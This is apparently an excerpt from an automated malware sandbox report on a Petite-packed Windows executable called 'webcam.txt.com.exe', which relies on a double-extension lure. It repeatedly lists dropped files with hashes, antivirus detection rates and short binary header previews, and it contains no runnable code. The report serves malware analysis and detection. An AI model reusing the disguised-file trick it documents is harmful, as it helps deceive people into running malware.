                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
